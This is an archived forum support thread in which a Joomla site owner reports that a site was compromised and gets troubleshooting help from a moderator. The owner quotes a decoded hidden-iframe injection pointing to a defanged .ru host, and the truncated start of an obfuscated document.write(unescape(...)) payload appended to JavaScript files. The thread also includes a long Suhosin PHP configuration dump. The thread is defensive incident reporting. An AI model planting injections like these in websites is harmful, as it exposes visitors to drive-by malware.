-
AuthorPosts
-
August 13, 2013 at 7:41 am #189677
FYI
I found malicious code from mysite.com/T3-assets/js_something.js . Code was encoded into end of the file and decoded version is :”<div style=”position:absolute; top:-508px;”><iframe src=”http://jqueryXXXXXjsscript.ru/”></iframe></div>”. (I added “X” -characters)
Also all folders which are writable by www-data has corrupted .htaccess and index_backup.php files.
I restore my site from the backups and now all is OK. Until next time… I have to leave some of the folders writable because of the functionality of the site – U know.
I’m NOT blaming anybody or anything but IF you know how to prevent this kind of situation – please let me know.
-jukka määttä-
Manos
Moderator
Manos
- Join date:
- February 2014
- Posts:
- 2806
- Downloads:
- 46
- Uploads:
- 56
- Thanks:
- 200
- Thanked:
- 633 times in 576 posts
August 13, 2013 at 7:53 am #502048Hi,
Can you please let me know your server setup ? I mean, what’s your php version and if you are aware that modules like suhosin and suEXEC are installed.
This is not a Joomla or template issue this is more like an issue with your server configuration.
Regards
Manos
August 13, 2013 at 9:43 am #502067Hi Manos and thanks for the quick reply. I got this information from my web-service provider:
PHP Version 5.3.3-7+squeeze14
/etc/php5/apache2/conf.d/suhosin.ini
Suhosin:
This server is protected with the Suhosin Extension 0.9.32.1Copyright (c) 2006-2007 Hardened-PHP Project
Copyright (c) 2007-2010 SektionEins GmbHDirective Local Value Master Value
suhosin.apc_bug_workaround Off Off
suhosin.cookie.checkraddr 0 0
suhosin.cookie.cryptdocroot On On
suhosin.cookie.cryptkey [ protected ] [ protected ]
suhosin.cookie.cryptlist no value no value
suhosin.cookie.cryptraddr 0 0
suhosin.cookie.cryptua On On
suhosin.cookie.disallow_nul 1 1
suhosin.cookie.disallow_ws 1 1
suhosin.cookie.encrypt Off Off
suhosin.cookie.max_array_depth 50 50
suhosin.cookie.max_array_index_length 64 64
suhosin.cookie.max_name_length 64 64
suhosin.cookie.max_totalname_length 256 256
suhosin.cookie.max_value_length 10000 10000
suhosin.cookie.max_vars 100 100
suhosin.cookie.plainlist no value no value
suhosin.coredump Off Off
suhosin.disable.display_errors Off Off
suhosin.executor.allow_symlink Off Off
suhosin.executor.disable_emodifier Off Off
suhosin.executor.disable_eval Off Off
suhosin.executor.eval.blacklist no value no value
suhosin.executor.eval.whitelist no value no value
suhosin.executor.func.blacklist no value no value
suhosin.executor.func.whitelist no value no value
suhosin.executor.include.allow_writable_files On On
suhosin.executor.include.blacklist no value no value
suhosin.executor.include.max_traversal 0 0
suhosin.executor.include.whitelist no value no value
suhosin.executor.max_depth 0 0
suhosin.filter.action no value no value
suhosin.get.disallow_nul 1 1
suhosin.get.disallow_ws 0 0
suhosin.get.max_array_depth 50 50
suhosin.get.max_array_index_length 64 64
suhosin.get.max_name_length 64 64
suhosin.get.max_totalname_length 256 256
suhosin.get.max_value_length 512 512
suhosin.get.max_vars 100 100
suhosin.log.file 0 0
suhosin.log.file.name no value no value
suhosin.log.phpscript 0 0
suhosin.log.phpscript.is_safe Off Off
suhosin.log.phpscript.name no value no value
suhosin.log.sapi 0 0
suhosin.log.script 0 0
suhosin.log.script.name no value no value
suhosin.log.syslog no value no value
suhosin.log.syslog.facility no value no value
suhosin.log.syslog.priority no value no value
suhosin.log.use-x-forwarded-for Off Off
suhosin.mail.protect 0 0
suhosin.memory_limit 0 0
suhosin.mt_srand.ignore On On
suhosin.multiheader Off Off
suhosin.perdir 0 0
suhosin.post.disallow_nul 1 1
suhosin.post.disallow_ws 0 0
suhosin.post.max_array_depth 50 50
suhosin.post.max_array_index_length 64 64
suhosin.post.max_name_length 64 64
suhosin.post.max_totalname_length 256 256
suhosin.post.max_value_length 1000000 1000000
suhosin.post.max_vars 1000 1000
suhosin.protectkey On On
suhosin.request.disallow_nul 1 1
suhosin.request.disallow_ws 0 0
suhosin.request.max_array_depth 50 50
suhosin.request.max_array_index_length 64 64
suhosin.request.max_totalname_length 256 256
suhosin.request.max_value_length 1000000 1000000
suhosin.request.max_varname_length 64 64
suhosin.request.max_vars 1000 1000
suhosin.server.encode On On
suhosin.server.strip On On
suhosin.session.checkraddr 0 0
suhosin.session.cryptdocroot On On
suhosin.session.cryptkey [ protected ] [ protected ]
suhosin.session.cryptraddr 0 0
suhosin.session.cryptua Off Off
suhosin.session.encrypt On On
suhosin.session.max_id_length 128 128
suhosin.simulation Off Off
suhosin.sql.bailout_on_error Off Off
suhosin.sql.comment 0 0
suhosin.sql.multiselect 0 0
suhosin.sql.opencomment 0 0
suhosin.sql.union 0 0
suhosin.sql.user_postfix no value no value
suhosin.sql.user_prefix no value no value
suhosin.srand.ignore On On
suhosin.stealth On On
suhosin.upload.disallow_binary 0 0
suhosin.upload.disallow_elf 1 1
suhosin.upload.max_uploads 25 25
suhosin.upload.remove_binary 0 0
suhosin.upload.verification_script no value no valueManos
Moderator
Manos
- Join date:
- February 2014
- Posts:
- 2806
- Downloads:
- 46
- Uploads:
- 56
- Thanks:
- 200
- Thanked:
- 633 times in 576 posts
August 13, 2013 at 10:44 am #502075Hi,
Looks like your php is configured quite well, is this a VPS/dedicated box or what? Maybe you need to search the log files in order to find out who got access to your server.
Also, do you have everything updated ? Joomla / Template / Modules / Plugins etc ?
The link/code you show us as a suspicious code makes me wonder that someone managed to “upload” files and “edit” files to your hosting environment.
Regards
Manos
1 user says Thank You to Manos for this useful post
August 13, 2013 at 12:45 pm #502080OK – it seems like all the *.js files are contaminated… all javascript files has
;document.write(unescape(‘%3C%73%63%72%69%70%74%3E%0A%…
code-thing at the end of the file.Nothing to do with Joomla!
-
AuthorPosts
This topic contains 6 replies, has 2 voices, and was last updated by Manos 11 years, 3 months ago.
We moved to new unified forum. Please post all new support queries in our New Forum